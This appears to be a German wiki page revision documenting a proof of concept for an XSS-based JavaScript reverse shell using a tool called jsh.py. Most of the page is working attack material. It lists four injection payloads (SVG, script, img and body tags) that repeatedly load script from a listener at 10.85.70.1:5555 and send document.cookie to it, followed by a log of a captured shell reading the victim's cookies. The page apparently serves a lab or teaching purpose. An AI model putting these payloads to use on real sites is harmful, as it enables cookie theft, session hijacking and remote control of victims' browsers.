Xss-poc-reverse-shell: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 19: Zeile 19:
 
Listening on [any] 5555 for incoming JS shell ...
 
Listening on [any] 5555 for incoming JS shell ...
 
</pre>
 
</pre>
 +
=Die Shell=
 +
Listening on [any] 5555 for incoming JS shell ...
 +
Got JS shell from [10.85.70.1] port 53146 to orville 5555
 +
>>> var test = 'hacked by xinux'
 +
>>> confirm(test)
 +
>>> prompt(document.cookie)
  
  

Version vom 27. Juli 2021, 18:45 Uhr

git clone

start

  • ./jsh.py -g -p 5555 -s 10.85.70.1
 
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v3.1

Payloads:  
 - SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)>
 - SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)</script>
 - IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)>
 - BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie}></body>

Listening on [any] 5555 for incoming JS shell ...

Die Shell

Listening on [any] 5555 for incoming JS shell ...
Got JS shell from [10.85.70.1] port 53146 to orville 5555
>>> var test = 'hacked by xinux'
>>> confirm(test)
>>> prompt(document.cookie)


Xss-poc-js-sh1.png

Links